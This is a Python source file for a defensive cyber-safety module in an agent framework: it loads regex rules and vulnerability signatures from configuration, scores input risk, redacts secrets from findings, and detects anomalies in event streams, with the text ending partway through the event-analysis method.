"""
------------------------------------------------------------------------------
Cyber Safety and Security Module for the SLAI Safety Agent Framework
------------------------------------------------------------------------------
Integrates principles of cyber defense, threat modeling, anomaly detection,
and adaptive responses, leveraging concepts from adaptive and QNN agents.
Relies primarily on native Python libraries, mathematical, and statistical methods.
------------------------------------------------------------------------------
Academic References:
- Threat Modeling: Shostack, A. (2014). Threat Modeling: Designing for Security. Wiley. (STRIDE)
- Anomaly Detection: Chandola, V., Banerjee, A., & Kumar, V. (2009). Anomaly detection: A survey. ACM computing surveys (CSUR), 41(3), 1-58.
- NIST Cybersecurity Framework: https://www.nist.gov/cyberframework
- Quantum-Inspired ML: Schuld, M., & Petruccione, F. (2018). Supervised Learning with Quantum Computers. Springer. (Conceptual basis for QNN integration)
------------------------------------------------------------------------------

Production notes
----------------
This module is an orchestration and cyber-safety analysis layer. It does not own
shared helper functions, secure memory policy, security incident taxonomy, or the
neural-network implementation. Those concerns remain delegated to safety_helpers,
security_error, secure_memory, and modules.neural_network respectively.
"""

from __future__ import annotations

import json
import math
import re
import time
import numpy as np

from collections import defaultdict, deque
from dataclasses import asdict, dataclass, field
from pathlib import Path
from typing import Any, Deque, Dict, Iterable, List, Mapping, Optional, Sequence, Tuple, Union

from .utils.config_loader import load_global_config, get_config_section
from .utils.safety_helpers import *
from .utils.security_error import *
from .modules.neural_network import NeuralNetwork
from .secure_memory import SecureMemory
from logs.logger import get_logger, PrettyPrinter # pyright: ignore[reportMissingImports]

logger = get_logger("SLAI Cyber Safety Module")
printer = PrettyPrinter()

MODULE_VERSION = "2.1.0"
ANALYSIS_SCHEMA_VERSION = "cyber_safety.analysis.v3"
EVENT_SCHEMA_VERSION = "cyber_safety.event.v2"
THREAT_SCHEMA_VERSION = "cyber_safety.threat.v2"


@dataclass(frozen=True)
class CyberFinding:
    """Audit-safe cyber finding generated by input or event analysis."""

    finding_id: str
    category: str
    finding_type: str
    name: str
    description: str
    severity: float
    confidence: float
    match_count: int = 1
    evidence_preview: str = ""
    pattern_fingerprint: str = ""
    remediation: str = ""
    source: str = "cyber_safety"
    tags: Tuple[str, ...] = field(default_factory=tuple)
    references: Tuple[str, ...] = field(default_factory=tuple)

    def to_dict(self) -> Dict[str, Any]:
        data = asdict(self)
        data["severity"] = clamp_score(data["severity"])
        data["confidence"] = clamp_score(data["confidence"], default=0.75)
    
        # Apply aggressive redaction to evidence_preview
        preview = data.get("evidence_preview", "")
        # Matches api_key=..., secret=..., token=..., password=... (with or without quotes)
        preview = re.sub(
            r'(?i)(api[_-]?key|secret|token|password|passwd|private_key|client_secret|access_token)\s*[:=]\s*[\'"]?[^\s,&;]+',
            r'\1=[REDACTED]',
            preview
        )
        # Also redact long alphanumeric strings that look like raw secrets
        preview = re.sub(r'\b[a-zA-Z0-9_]{20,}\b', '[REDACTED]', preview)
        data["evidence_preview"] = redact_text(preview, max_length=240)
    
        return sanitize_for_logging(data)


@dataclass(frozen=True)
class CyberAnalysisResult:
    """Structured result returned by analyze_input."""

    schema_version: str
    analysis_id: str
    timestamp: str
    context: str
    input_fingerprint: str
    risk_score: float
    risk_level: str
    decision: str
    findings: List[CyberFinding]
    recommendations: List[str]
    model_score: Optional[float] = None
    rule_score: float = 0.0
    vulnerability_score: float = 0.0
    context_score: float = 0.0
    metadata: Dict[str, Any] = field(default_factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        return sanitize_for_logging({
            "schema_version": self.schema_version,
            "analysis_id": self.analysis_id,
            "timestamp": self.timestamp,
            "context": self.context,
            "input_fingerprint": self.input_fingerprint,
            "risk_score": clamp_score(self.risk_score),
            "risk_level": self.risk_level,
            "decision": self.decision,
            "findings": [finding.to_dict() for finding in self.findings],
            "recommendations": list(self.recommendations),
            "model_score": self.model_score,
            "rule_score": clamp_score(self.rule_score),
            "vulnerability_score": clamp_score(self.vulnerability_score),
            "context_score": clamp_score(self.context_score),
            "metadata": self.metadata,
        })


@dataclass(frozen=True)
class EventAnalysisResult:
    """Structured anomaly-analysis result returned by analyze_event_stream."""

    schema_version: str
    event_id: str
    timestamp: str
    event_type: str
    entity: str
    anomaly_score: float
    normalized_anomaly_score: float
    is_anomaly: bool
    risk_level: str
    decision: str
    reason: str
    contributors: List[str]
    feature_scores: Dict[str, float]
    sequence: Tuple[str, ...]
    metadata: Dict[str, Any] = field(default_factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        return sanitize_for_logging({
            "schema_version": self.schema_version,
            "event_id": self.event_id,
            "timestamp": self.timestamp,
            "event_type": self.event_type,
            "entity": self.entity,
            "anomaly_score": self.anomaly_score,
            "normalized_anomaly_score": clamp_score(self.normalized_anomaly_score),
            "is_anomaly": self.is_anomaly,
            "risk_level": self.risk_level,
            "decision": self.decision,
            "reason": self.reason,
            "contributors": list(self.contributors),
            "feature_scores": dict(self.feature_scores),
            "sequence": list(self.sequence),
            "metadata": self.metadata,
        })


@dataclass
class RunningStatistic:
    """Numerically stable streaming statistic using Welford updates."""

    count: int = 0
    mean: float = 0.0
    m2: float = 0.0

    def update(self, value: float) -> None:
        self.count += 1
        delta = value - self.mean
        self.mean += delta / self.count
        self.m2 += delta * (value - self.mean)

    @property
    def variance(self) -> float:
        return self.m2 / max(self.count - 1, 1) if self.count > 1 else 0.0

    @property
    def std_dev(self) -> float:
        return math.sqrt(max(0.0, self.variance))

    def z_score(self, value: float) -> float:
        return abs(value - self.mean) / self.std_dev if self.std_dev > 1e-9 else 0.0

    def to_dict(self) -> Dict[str, Any]:
        return {"count": self.count, "mean": self.mean, "std_dev": self.std_dev}


@dataclass(frozen=True)
class ThreatAssessmentResult:
    """Structured STRIDE-style threat assessment."""

    schema_version: str
    assessment_id: str
    timestamp: str
    component: str
    action: str
    network_zone: str
    risk_score: float
    overall_risk: str
    threats: Dict[str, List[str]]
    mitigations: List[str]
    metadata: Dict[str, Any] = field(default_factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        return sanitize_for_logging({
            "schema_version": self.schema_version,
            "assessment_id": self.assessment_id,
            "timestamp": self.timestamp,
            "component": self.component,
            "action": self.action,
            "network_zone": self.network_zone,
            "risk_score": clamp_score(self.risk_score),
            "overall_risk": self.overall_risk,
            "threats": self.threats,
            "mitigations": self.mitigations,
            "metadata": self.metadata,
        })


class CyberSafetyModule:
    """
    Cyber safety analysis, threat detection, and adaptive response support.

    The module combines regex/signature detection, contextual heuristics,
    statistical event-stream anomaly detection, QNN-inspired centroid distance,
    and the production native NeuralNetwork model for compact threat scoring.
    """

    def __init__(self):
        self.config = load_global_config()
        self.cyber_config = get_config_section("cyber_safety")
        self._validate_configuration()

        self.memory = SecureMemory()
        self.anomaly_threshold = coerce_float(self.cyber_config.get("anomaly_threshold"), 3.0, minimum=0.01)
        self.max_log_history = coerce_int(self.cyber_config.get("max_log_history"), 1000, minimum=10)
        self.qnn_feature_dim = coerce_int(self.cyber_config.get("qnn_feature_dim"), 8, minimum=2, maximum=4096)
        self.adaptive_centroid_lr = coerce_float(self.cyber_config.get("adaptive_centroid_lr"), 0.01, minimum=0.0, maximum=1.0)
        self.use_qnn_inspired = coerce_bool(self.cyber_config.get("qnn_inspired_anomaly"), False)

        self.security_rules = self._load_security_rules()
        self.vulnerability_signatures = self._load_vulnerability_signatures()
        self.compiled_rule_patterns = self._compile_rule_patterns(self.security_rules.get("patterns", []))
        self.compiled_vulnerability_patterns = self._compile_vulnerability_signatures(self.vulnerability_signatures)

        sequence_window = coerce_int(get_nested(self.cyber_config, "event_stream.sequence_window", 10), 10, minimum=3)
        self.event_log_history: Deque[Dict[str, Any]] = deque(maxlen=self.max_log_history)
        self.sequence_patterns: Dict[str, Deque[str]] = defaultdict(lambda: deque(maxlen=sequence_window))
        self.sequence_counts: Dict[str, int] = defaultdict(int)
        self.event_statistics: Dict[str, RunningStatistic] = defaultdict(RunningStatistic)
        self.qnn_state_representation: Optional[np.ndarray] = None
        self.model: Optional[NeuralNetwork] = self._load_security_model()

        logger.info("Cyber Safety Module initialized: %s", stable_json(safe_log_payload(
            "cyber_safety.initialized",
            {
                "schema_version": self.cyber_config.get("schema_version"),
                "rules": len(self.compiled_rule_patterns),
                "vulnerability_signatures": len(self.compiled_vulnerability_patterns),
                "qnn_inspired": self.use_qnn_inspired,
                "model_enabled": self.model is not None,
            },
        )))

    # ------------------------------------------------------------------
    # Configuration and resource loading
    # ------------------------------------------------------------------

    def _validate_configuration(self) -> None:
        required_keys = [
            "anomaly_threshold",
            "max_log_history",
            "qnn_inspired_anomaly",
            "qnn_feature_dim",
            "adaptive_centroid_lr",
            "security_rules",
            "vulnerability_signatures_path",
            "model",
            "risk_thresholds",
        ]
        require_keys(self.cyber_config, required_keys, context="cyber_safety")
        model_cfg = get_nested(self.cyber_config, "model", {})
        if not isinstance(model_cfg, Mapping):
            raise ConfigurationTamperingError(
                config_file_path=str(self.config.get("__config_path__", "secure_config.yaml")),
                suspicious_change="cyber_safety.model must be a mapping",
                component="cyber_safety",
            )
        if coerce_bool(model_cfg.get("enabled"), True) and not isinstance(model_cfg.get("layer_config"), Sequence):
            raise ConfigurationTamperingError(
                config_file_path=str(self.config.get("__config_path__", "secure_config.yaml")),
                suspicious_change="cyber_safety.model.layer_config must be a sequence",
                component="cyber_safety",
            )

    def _load_security_rules(self) -> Dict[str, Any]:
        inline_rules = self.cyber_config.get("security_rules")
        if not isinstance(inline_rules, Mapping):
            inline_rules = {"principles": [], "patterns": []}

        configured_path = self.cyber_config.get("cyber_rules_path")
        file_rules = self._load_json_resource(configured_path, "Cyber Security Rules", expected_type=dict, required=False)

        merged = dict(inline_rules)
        if isinstance(file_rules, Mapping) and file_rules:
            merged["principles"] = dedupe_preserve_order(list(inline_rules.get("principles", [])) + list(file_rules.get("principles", [])))
            merged["patterns"] = list(inline_rules.get("patterns", [])) + list(file_rules.get("patterns", []))
        else:
            merged["patterns"] = list(inline_rules.get("patterns", []))

        for source in self.cyber_config.get("pattern_sources", []) or []:
            if not isinstance(source, Mapping):
                continue
            source_patterns = self._load_json_resource(
                source.get("path"),
                str(source.get("name", "Pattern Source")),
                expected_type=list,
                required=coerce_bool(source.get("required"), False),
            )
            if not source_patterns:
                continue
            regexes: List[str] = []
            for item in source_patterns:
                if isinstance(item, Mapping) and item.get("pattern"):
                    regexes.append(str(item["pattern"]))
                elif isinstance(item, str):
                    regexes.append(item)
            if regexes:
                merged["patterns"].append({
                    "name": str(source.get("name", "External Pattern Source")),
                    "category": str(source.get("category", "cyber_threat")),
                    "regex_list": regexes,
                    "severity": source.get("severity", 0.6),
                    "confidence": source.get("confidence", 0.75),
                    "remediation": str(source.get("remediation", "Review and mitigate the matched external pattern.")),
                    "tags": list(source.get("tags", [])),
                })
        return merged

    def _load_vulnerability_signatures(self) -> Dict[str, Any]:
        inline_signatures = self.cyber_config.get("vulnerability_signatures")
        configured_path = self.cyber_config.get("vulnerability_signatures_path")
        loaded = self._load_json_resource(configured_path, "Vulnerability Signatures", expected_type=dict, required=False)
        if isinstance(loaded, Mapping) and loaded:
            return dict(loaded)
        return dict(inline_signatures or {}) if isinstance(inline_signatures, Mapping) else {}

    def _load_json_resource(self, file_path: Optional[Union[str, Path]], resource_name: str, *, expected_type: type, required: bool) -> Any:
        if not file_path:
            if required:
                raise ConfigurationTamperingError(
                    config_file_path="secure_config.yaml:cyber_safety",
                    suspicious_change=f"Missing required {resource_name} path",
                    component="cyber_safety",
                )
            return {} if expected_type is dict else []

        path = Path(str(file_path)).expanduser()
        try:
            raw = load_text_file(path, max_bytes=coerce_int(get_nested(self.cyber_config, "resource_loading.max_json_bytes", 1048576), 1048576, minimum=1024))
            parsed = json.loads(raw)
            if not isinstance(parsed, expected_type):
                raise ConfigurationTamperingError(
                    config_file_path=str(path),
                    suspicious_change=f"{resource_name} must be {expected_type.__name__}",
                    component="cyber_safety",
                )
            logger.info("Loaded %s from %s", resource_name, path)
            return parsed
        except FileNotFoundError:
            if required:
                raise SystemIntegrityError(
                    component="cyber_safety.resource_loader",
                    anomaly_description=f"Required {resource_name} file not found",
                    expected_state=str(path),
                    actual_state="missing",
                )
            logger.warning("%s file not found at %s; using YAML-backed rules.", resource_name, path)
        except SecurityError as exc:
            if required:
                raise
            logger.warning("%s could not be loaded from %s; using YAML-backed rules: %s", resource_name, path, type(exc).__name__)
        except Exception as exc:
            if required:
                raise wrap_security_exception(
                    exc,
                    operation=f"load_{normalize_identifier(resource_name)}",
                    component="cyber_safety",
                    context={"path": str(path), "resource_name": resource_name},
                    error_type=SecurityErrorType.CONFIGURATION_TAMPERING,
                    severity=SecuritySeverity.HIGH,
                ) from exc
            logger.warning("Failed to load %s from %s: %s", resource_name, path, type(exc).__name__)
        return {} if expected_type is dict else []

    def _compile_rule_patterns(self, rules: Sequence[Mapping[str, Any]]) -> List[Dict[str, Any]]:
        compiled: List[Dict[str, Any]] = []
        strict = coerce_bool(get_nested(self.cyber_config, "resource_loading.strict_pattern_validation", True), True)
        for rule in rules or []:
            if not isinstance(rule, Mapping):
                continue
            rule_name = normalize_text(rule.get("name", "unnamed_rule"), max_length=96)
            severity = clamp_score(rule.get("severity", 0.5), default=0.5)
            confidence = clamp_score(rule.get("confidence", 0.75), default=0.75)
            category = normalize_identifier(rule.get("category", "cyber_threat"), max_length=64)
            remediation = normalize_text(rule.get("remediation", "Review and mitigate this security finding."), max_length=512)
            tags = tuple(str(tag) for tag in rule.get("tags", []) or [])
            for pattern in rule.get("regex_list", []) or []:
                try:
                    compiled.append({
                        "name": rule_name,
                        "category": category,
                        "severity": severity,
                        "confidence": confidence,
                        "pattern": str(pattern),
                        "compiled": re.compile(str(pattern), re.IGNORECASE | re.MULTILINE),
                        "remediation": remediation,
                        "tags": tags,
                    })
                except re.error as exc:
                    if strict:
                        raise ConfigurationTamperingError(
                            config_file_path="secure_config.yaml:cyber_safety.security_rules",
                            suspicious_change=f"Invalid regex for {rule_name}: {exc}",
                            component="cyber_safety",
                        ) from exc
                    logger.warning("Skipping invalid cyber safety regex for %s: %s", rule_name, exc)
        return compiled

    def _compile_vulnerability_signatures(self, signatures: Mapping[str, Mapping[str, Any]]) -> List[Dict[str, Any]]:
        compiled: List[Dict[str, Any]] = []
        strict = coerce_bool(get_nested(self.cyber_config, "resource_loading.strict_pattern_validation", True), True)
        for signature_id, raw_data in (signatures or {}).items():
            if not isinstance(raw_data, Mapping):
                continue
            pattern = raw_data.get("pattern")
            if not pattern:
                continue
            try:
                compiled.append({
                    "id": str(signature_id),
                    "name": str(raw_data.get("type", signature_id)),
                    "description": str(raw_data.get("description", raw_data.get("type", "Known vulnerability signature"))),
                    "severity": clamp_score(raw_data.get("severity", 0.8), default=0.8),
                    "confidence": clamp_score(raw_data.get("confidence", 0.85), default=0.85),
                    "pattern": str(pattern),
                    "compiled": re.compile(str(pattern), re.IGNORECASE | re.MULTILINE | re.DOTALL),
                    "remediation": str(raw_data.get("remediation", "Patch or mitigate the affected component.")),
                    "references": tuple(str(ref) for ref in raw_data.get("references", []) or []),
                })
            except re.error as exc:
                if strict:
                    raise ConfigurationTamperingError(
                        config_file_path="secure_config.yaml:cyber_safety.vulnerability_signatures",
                        suspicious_change=f"Invalid vulnerability regex for {signature_id}: {exc}",
                        component="cyber_safety",
                    ) from exc
                logger.warning("Skipping invalid vulnerability signature %s: %s", signature_id, exc)
        return compiled

    def _load_security_model(self) -> Optional[NeuralNetwork]:
        model_cfg = get_nested(self.cyber_config, "model", {})
        if not coerce_bool(model_cfg.get("enabled", True), True):
            return None

        num_inputs = coerce_int(model_cfg.get("num_inputs", 8), 8, minimum=1)
        model_path = model_cfg.get("model_path")
        allow_fallback = coerce_bool(model_cfg.get("allow_untrained_fallback", True), True)
        nn_config = dict(get_config_section("neural_network") or {})
        custom_config = dict(model_cfg.get("neural_network_overrides", {}) or {})
        nn_config.update(custom_config)

        if model_path and Path(str(model_path)).expanduser().is_file():
            try:
                model = NeuralNetwork.load_model(str(model_path), custom_config_override=custom_config or None)
                if model.num_inputs != num_inputs:
                    raise ModelTamperingDetectedError(
                        model_name=str(model_path),
                        detection_method="cyber_safety_model_input_dimension",
                        expected_hash=str(num_inputs),
                        actual_hash=str(model.num_inputs),
                        component="cyber_safety",
                    )
                return model
            except SecurityError:
                raise
            except Exception as exc:
                if not allow_fallback:
                    raise wrap_security_exception(
                        exc,
                        operation="load_cyber_safety_model",
                        component="cyber_safety",
                        context={"model_path": str(model_path)},
                        error_type=SecurityErrorType.MODEL_TAMPERING,
                        severity=SecuritySeverity.CRITICAL,
                    ) from exc
                logger.warning("Unable to load cyber safety model from %s; initializing configured fallback: %s", model_path, type(exc).__name__)

        if not allow_fallback:
            raise ModelTamperingDetectedError(
                model_name=str(model_path or "cyber_safety_model"),
                detection_method="missing_required_model",
                expected_hash="signed model file",
                actual_hash="missing",
                component="cyber_safety",
            )

        return NeuralNetwork(
            num_inputs=num_inputs,
            layer_config=list(model_cfg.get("layer_config") or []),
            loss_function_name=str(model_cfg.get("loss_function_name", "cross_entropy")),
            optimizer_name=str(model_cfg.get("optimizer_name", "adam")),
            initialization_method_default=str(model_cfg.get("initialization_method_default", nn_config.get("initialization_method_default", "he_normal"))),
            problem_type=str(model_cfg.get("problem_type", "binary_classification")),
            config=nn_config,
        )

    # ------------------------------------------------------------------
    # Input analysis
    # ------------------------------------------------------------------

    def analyze_input(self, input_data: Any, context: str = "general") -> Dict[str, Any]:
        """Analyze text, config, code, or API payloads for cyber-safety risks."""
        
        printer.status("CYBER", "Analyzing input", "info")
        input_str = self._stringify_input(input_data)
        context_norm = normalize_identifier(context or "general", max_length=80)
        findings: List[CyberFinding] = []
        findings.extend(self._detect_rule_findings(input_str))
        findings.extend(self._detect_vulnerability_findings(input_str, context_norm))
        findings.extend(self._detect_contextual_findings(input_str, context_norm))
    
        rule_score = combine_risk_scores(*(finding.severity for finding in findings if finding.finding_type in {"pattern", "heuristic", "secret_exposure", "content_safety", "prompt_security"}), method="noisy_or")
        vulnerability_score = combine_risk_scores(*(finding.severity for finding in findings if finding.finding_type == "vulnerability_signature"), method="noisy_or")
        context_score = self._context_risk_score(context_norm, input_str)
        model_score = self._score_with_model(input_str, findings, context_norm)
        
        weights = get_nested(self.cyber_config, "risk_weights.input", {}) or {}
        score_inputs = {"rules": rule_score, "vulnerabilities": vulnerability_score, "context": context_score}
        if model_score is not None:
            score_inputs["model"] = model_score
        risk_score = weighted_average(score_inputs, weights, default=max(score_inputs.values() or [0.0]))
        
        if findings:
            risk_score = max(risk_score, max(finding.severity * finding.confidence for finding in findings))
        risk_score = clamp_score(risk_score)
        
        decision = threshold_decision(
            risk_score,
            block_threshold=coerce_float(get_nested(self.cyber_config, "risk_thresholds.block"), 0.75),
            review_threshold=coerce_float(get_nested(self.cyber_config, "risk_thresholds.review"), 0.5),
        )
        
        result = CyberAnalysisResult(
            schema_version=ANALYSIS_SCHEMA_VERSION,
            analysis_id=generate_identifier("cyber_analysis"),
            timestamp=utc_iso(),
            context=context_norm,
            input_fingerprint=fingerprint(input_str),
            risk_score=risk_score,
            risk_level=categorize_risk(risk_score),
            decision=decision,
            findings=findings,
            recommendations=self._generate_recommendations([finding.to_dict() for finding in findings]),
            model_score=model_score,
            rule_score=rule_score,
            vulnerability_score=vulnerability_score,
            context_score=context_score,
            metadata={"input_length": len(input_str), "finding_count": len(findings), "module_version": MODULE_VERSION},
        )
        
        self._store_analysis("input_analysis", result.to_dict(), sensitivity=coerce_float(get_nested(self.cyber_config, "memory.input_analysis_sensitivity", 0.75), 0.75))
        
        if decision == "block" and coerce_bool(get_nested(self.cyber_config, "fail_closed.raise_on_block", False), False):
            raise UnsafeExecutionError(
                operation=f"cyber_safety.analyze_input:{context_norm}",
                risk_score=risk_score,
                details="Cyber safety analysis reached block threshold.",
                context=result.to_dict(),
                component="cyber_safety",
            )
        
        # ------------------------------------------------------------
        # DEFENSIVE REDACTION PASS – ensures no secrets leak in output
        # ------------------------------------------------------------
        result_dict = result.to_dict()
        
        # Helper to recursively redact all strings
        def _deep_redact(obj):
            if isinstance(obj, dict):
                return {k: _deep_redact(v) for k, v in obj.items()}
            if isinstance(obj, list):
                return [_deep_redact(v) for v in obj]
            if isinstance(obj, str):
                # First apply the global redact_text
                redacted = redact_text(obj, max_length=8192)
                # Then also remove any remaining long alnum+underscore strings
                redacted = re.sub(r'\b[a-zA-Z0-9_]{20,}\b', '[REDACTED]', redacted)
                return redacted
            return obj
        
        result_dict = _deep_redact(result_dict)
        return result_dict # type: ignore

    def _stringify_input(self, input_data: Any) -> str:
        try:
            if isinstance(input_data, (Mapping, list, tuple, set)):
                return stable_json(input_data)
            return normalize_text(input_data, max_length=coerce_int(get_nested(self.cyber_config, "max_input_text_length", 65536), 65536), preserve_newlines=True)
        except Exception as exc:
            raise wrap_security_exception(
                exc,
                operation="stringify_cyber_input",
                component="cyber_safety",
                context={"input_type": type(input_data).__name__},
                error_type=SecurityErrorType.UNSAFE_EXECUTION_ATTEMPT,
                severity=SecuritySeverity.MEDIUM,
            ) from exc

    def _detect_rule_findings(self, input_str: str) -> List[CyberFinding]:
        findings: List[CyberFinding] = []
        max_matches = coerce_int(get_nested(self.cyber_config, "detection.max_matches_per_rule", 25), 25, minimum=1)
        for rule in self.compiled_rule_patterns:
            matches = list(rule["compiled"].finditer(input_str))[:max_matches]
            if not matches:
                continue
            preview = redact_text(matches[0].group(0), max_length=160)
            finding_type = self._finding_type_for_category(rule.get("category"))
            findings.append(CyberFinding(
                finding_id=generate_identifier("finding"),
                category=str(rule["category"]),
                finding_type=finding_type,
                name=str(rule["name"]),
                description=f"Matched cyber safety pattern: {rule['name']}",
                severity=rule["severity"],
                confidence=rule["confidence"],
                match_count=len(matches),
                evidence_preview=preview,
                pattern_fingerprint=fingerprint(rule["pattern"]),
                remediation=rule["remediation"],
                tags=tuple(rule.get("tags", ())),
            ))
        return findings

    def _detect_vulnerability_findings(self, input_str: str, context: str) -> List[CyberFinding]:
        findings: List[CyberFinding] = []
        for signature in self.compiled_vulnerability_patterns:
            match = signature["compiled"].search(input_str)
            if not match:
                continue
            findings.append(CyberFinding(
                finding_id=generate_identifier("finding"),
                category="cyber_threat",
                finding_type="vulnerability_signature",
                name=signature["id"],
                description=signature["description"],
                severity=signature["severity"],
                confidence=signature["confidence"],
                match_count=1,
                evidence_preview=redact_text(match.group(0), max_length=160),
                pattern_fingerprint=fingerprint(signature["pattern"]),
                remediation=signature["remediation"],
                source="vulnerability_signatures",
                tags=("vulnerability", "exploit", context),
                references=tuple(signature.get("references", ())),
            ))
        return findings

    def _detect_contextual_findings(self, input_str: str, context: str) -> List[CyberFinding]:
        findings: List[CyberFinding] = []
        contextual_rules = get_nested(self.cyber_config, "contextual_heuristics", {}) or {}
        selected_rules = list(contextual_rules.get(context, [])) + list(contextual_rules.get("global", []))
        strict = coerce_bool(get_nested(self.cyber_config, "resource_loading.strict_pattern_validation", True), True)
        for rule in selected_rules:
            if not isinstance(rule, Mapping):
                continue
            pattern = str(rule.get("pattern", ""))
            if not pattern:
                continue
            try:
                compiled = re.compile(pattern, re.IGNORECASE | re.MULTILINE | re.DOTALL)
                matches = list(compiled.finditer(input_str))
            except re.error as exc:
                if strict:
                    raise ConfigurationTamperingError(
                        config_file_path="secure_config.yaml:cyber_safety.contextual_heuristics",
                        suspicious_change=f"Invalid contextual heuristic regex: {exc}",
                        component="cyber_safety",
                    ) from exc
                continue
            if not matches:
                continue
            category = normalize_identifier(rule.get("category", "execution_operational_safety"), max_length=64)
            severity = clamp_score(rule.get("severity", 0.5), default=0.5)
            findings.append(CyberFinding(
                finding_id=generate_identifier("finding"),
                category=category,
                finding_type="heuristic",
                name=normalize_text(rule.get("name", "contextual_heuristic"), max_length=96),
                description=normalize_text(rule.get("description", "Contextual cyber-safety heuristic matched."), max_length=512),
                severity=severity,
                confidence=clamp_score(rule.get("confidence", 0.7), default=0.7),
                match_count=len(matches),
                evidence_preview=redact_text(matches[0].group(0), max_length=160),
                pattern_fingerprint=fingerprint(pattern),
                remediation=normalize_text(rule.get("remediation", "Review the matched behavior and apply context-specific controls."), max_length=512),
                tags=tuple(str(tag) for tag in rule.get("tags", []) or []),
            ))
        return findings

    def _finding_type_for_category(self, category: Any) -> str:
        category_text = str(category or "").lower()
        if "privacy" in category_text or "data" in category_text:
            return "secret_exposure"
        if "prompt" in category_text or "manipulation" in category_text:
            return "prompt_security"
        if "content" in category_text or "toxicity" in category_text:
            return "content_safety"
        return "pattern"

    def _context_risk_score(self, context: str, input_str: str) -> float:
        context_weights = get_nested(self.cyber_config, "context_risk", {}) or {}
        base = clamp_score(context_weights.get(context, context_weights.get("default", 0.0)), default=0.0)
        length_limit = coerce_int(get_nested(self.cyber_config, "input_size_limit", 65536), 65536, minimum=1)
        length_score = clamp_score(len(input_str) / length_limit)
        return clamp_score(max(base, length_score * coerce_float(context_weights.get("length_weight", 0.2), 0.2)))

    def _score_with_model(self, input_str: str, findings: Sequence[CyberFinding], context: str) -> Optional[float]:
        if self.model is None:
            return None
        try:
            features = self._build_model_features(input_str, findings, context)
            outputs = self.model.predict(features)
            return clamp_score(outputs[0] if outputs else 0.0)
        except SecurityError:
            raise
        except Exception as exc:
            if coerce_bool(get_nested(self.cyber_config, "model.fail_closed_on_prediction_error", False), False):
                raise wrap_security_exception(
                    exc,
                    operation="cyber_safety_model_predict",
                    component="cyber_safety",
                    context={"input_fingerprint": fingerprint(input_str), "context": context},
                    error_type=SecurityErrorType.UNSAFE_MODEL_STATE,
                    severity=SecuritySeverity.HIGH,
                ) from exc
            logger.warning("Cyber safety model scoring failed: %s", type(exc).__name__)
            return None

    def _build_model_features(self, input_str: str, findings: Sequence[CyberFinding], context: str) -> List[float]:
        model_cfg = get_nested(self.cyber_config, "model", {}) or {}
        num_inputs = coerce_int(model_cfg.get("num_inputs", 8), 8, minimum=1)
        category_counts: Dict[str, int] = defaultdict(int)
        max_severity = 0.0
        for finding in findings:
            category_counts[finding.finding_type] += finding.match_count
            max_severity = max(max_severity, finding.severity)
        feature_map = {
            "length": clamp_score(len(input_str) / coerce_int(get_nested(self.cyber_config, "input_size_limit", 65536), 65536, minimum=1)),
            "entropy": self._normalized_entropy(input_str),
            "finding_count": clamp_score(len(findings) / coerce_float(get_nested(self.cyber_config, "model.finding_count_scale", 10.0), 10.0, minimum=1.0)),
            "max_severity": max_severity,
            "secret_exposure_count": clamp_score(category_counts.get("secret_exposure", 0) / 5.0),
            "injection_count": clamp_score(category_counts.get("pattern", 0) / 5.0),
            "vulnerability_count": clamp_score(category_counts.get("vulnerability_signature", 0) / 3.0),
            "context_risk": self._context_risk_score(context, input_str),
        }
        order = list(model_cfg.get("feature_order", [])) or list(feature_map.keys())
        values = [coerce_float(feature_map.get(name, 0.0), 0.0, minimum=0.0, maximum=1.0) for name in order]
        if len(values) < num_inputs:
            values.extend([0.0] * (num_inputs - len(values)))
        return values[:num_inputs]

    def _normalized_entropy(self, text: str) -> float:
        if not text:
            return 0.0
        counts: Dict[str, int] = defaultdict(int)
        for char in text:
            counts[char] += 1
        total = float(len(text))
        entropy = -sum((count / total) * math.log2(count / total) for count in counts.values())
        return clamp_score(entropy / 8.0)

    def _generate_recommendations(self, findings: List[Dict[str, Any]]) -> List[str]:
        recs: List[str] = []
        for finding in findings:
            remediation = finding.get("remediation")
            if remediation:
                recs.append(str(remediation))
            finding_type = str(finding.get("finding_type", ""))
            if finding_type == "secret_exposure":
                recs.append("Rotate exposed credentials, remove them from logs/artifacts, and verify secret-scanning controls.")
            elif finding_type == "vulnerability_signature":
                recs.append("Patch or mitigate the affected component, then search telemetry for related exploitation attempts.")
            elif finding_type == "prompt_security":
                recs.append("Reject the prompt-security bypass attempt and preserve a redacted sample for regression testing.")
            elif finding_type == "content_safety":
                recs.append("Route harmful or abusive content through the content-safety control path before any downstream action.")
        if not recs:
            recs.append("No immediate cyber-safety concerns detected by the configured rules; continue routine monitoring.")
        return dedupe_preserve_order(recs)[:coerce_int(get_nested(self.cyber_config, "detection.max_recommendations", 12), 12, minimum=1)]

    # ------------------------------------------------------------------
    # Event stream anomaly detection
    # ------------------------------------------------------------------

    def analyze_event_stream(self, event: Dict[str, Any]) -> Dict[str, Any]:
        """Analyze a log/API/event stream item for statistical, sequence, and centroid anomalies."""

        printer.status("CYBER", "Analyzing streaming event", "info")
        if not isinstance(event, Mapping):
            raise UnsafeExecutionError(operation="cyber_safety.analyze_event_stream", risk_score=0.65, details="Event must be a mapping.", component="cyber_safety")
        if "timestamp" not in event:
            raise UnsafeExecutionError(operation="cyber_safety.analyze_event_stream", risk_score=0.65, details="Event missing required timestamp field.", component="cyber_safety")

        safe_event = sanitize_for_logging(dict(event))
        self.event_log_history.append(safe_event)
        event_type = normalize_identifier(event.get("type", "unknown_event"), max_length=96)
        entity = normalize_text(event.get("user") or event.get("ip_address") or event.get("actor_id") or "global", max_length=128)
        details = event.get("details", {}) if isinstance(event.get("details", {}), Mapping) else {}
        numerical_features = {str(k): coerce_float(v, 0.0) for k, v in details.items() if isinstance(v, (int, float)) and not isinstance(v, bool)}

        feature_scores: Dict[str, float] = {}
        contributors: List[str] = []
        min_stat_samples = coerce_int(get_nested(self.cyber_config, "event_stream.min_stat_samples", 30), 30, minimum=2)
        for feature, value in numerical_features.items():
            stat_key = f"{event_type}:{normalize_identifier(feature, max_length=64)}"
            stats = self.event_statistics[stat_key]
            stats.update(value)
            z = stats.z_score(value) if stats.count >= min_stat_samples else 0.0
            if z > 0:
                feature_scores[f"stat:{feature}"] = z
            if z >= self.anomaly_threshold:
                contributors.append(f"statistical:{feature}")

        sequence_score = self._update_and_score_sequence(entity, event_type)
        if sequence_score > 0:
            feature_scores["sequence"] = sequence_score
        if sequence_score >= self.anomaly_threshold:
